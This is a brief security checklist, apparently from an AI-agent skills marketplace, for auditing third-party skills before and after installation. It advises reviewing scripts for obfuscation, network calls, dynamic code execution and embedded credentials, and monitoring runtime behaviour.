Skill Security Audit Checklist
Before deploying any skill — whether from ClawHub or a third-party source — conduct a security audit. This checklist covers the critical areas to review.
Pre-Installation Review
- Read the entire
SKILL.mdfile. Understand what the skill instructs the agent to do. - Review all scripts in the
scripts/directory. Check for obfuscated code, network calls, or file operations outside the workspace. - Verify the author's identity. Check their ClawHub profile, GitHub history, and community reputation.
- Check the skill's permission requirements. Be wary of skills that request broad file system access or unrestricted command execution.
Code Review
- Search for hardcoded URLs or IP addresses — these could indicate data exfiltration endpoints
- Check for
eval(),exec(), or dynamic code execution patterns - Verify that API keys or credentials are not embedded in the skill
- Ensure file operations are scoped to the workspace directory
- Look for base64-encoded strings that could hide malicious payloads
Runtime Monitoring
After installation, monitor the skill's behavior during its first several uses:
- Enable verbose logging to capture all actions the skill triggers
- Watch for unexpected network connections
- Verify that file access stays within expected boundaries
- Check that the skill's actual behavior matches its documented behavior
Skills Library
Access 2,500+ verified skills to expand your agent's capabilities.